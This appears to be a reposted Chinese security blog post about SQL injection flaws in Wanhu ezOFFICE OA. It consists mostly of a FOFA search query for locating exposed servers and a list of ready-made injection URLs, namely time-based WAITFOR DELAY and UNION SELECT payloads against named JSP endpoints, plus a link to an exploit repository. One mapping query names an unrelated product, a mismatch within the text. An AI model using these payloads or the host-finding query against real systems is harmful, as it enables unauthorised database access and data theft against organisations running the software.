漏洞复现-万户 OA 存在11处sql注入

admin 2024年2月8日00:44:45评论39 views字数 1244阅读4分8秒阅读模式

万户 OA

一:漏洞描述

FOFA:app="万户网络-ezOFFICE"

二:网络空间测绘查询

fofa

app="大唐电信AC集中管理平台" && fid="gmqJFLGz7L/7TdQxUJFBXQ=="

三:payload


/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;xc?RecordID=1

defaultroot/public/iWebOfficeSign/DocumentEditExcel.jsp;?RecordID=1

/defaultroot/public/iWebPDF/DocumentEdit.jsp;?RecordID=1

/defaultroot/public/iWebOfficeSign/Dossier_DocumentEdit.jsp?RecordID=1

/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1

/defaultroot/public/iWebOfficeSign/DocumentEdit_deal.jsp;?RecordID=1

/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1

/defaultroot/platform/bpm/work_flow/operate/wf_accessory_delete.jsp;?wf_work_accessory_id=1%3BWAITFOR+DELAY+%270%3A0%3A5%27--

/defaultroot/wpsservlet?option=getSign&userId=1;WAITFOR%20DELAY%20%270:0:5%27--&orgIdString=1&domainId=1

/defaultroot/platform/portal/portlet/pic/pic.jsp?num=1&channelId=1%27;WAITFOR%20DELAY%20%270:0:5%27--

/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27123456%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--

四:往期漏洞复现

漏洞复现-万户 OA 存在11处sql注入

https://github.com/Y1-K1NG/poc_exp

原文始发于微信公众号(Yi安全):漏洞复现-万户 OA 存在11处sql注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月8日00:44:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-万户 OA 存在11处sql注入https://cn-sec.com/archives/2480075.html

发表评论

匿名网友 填写信息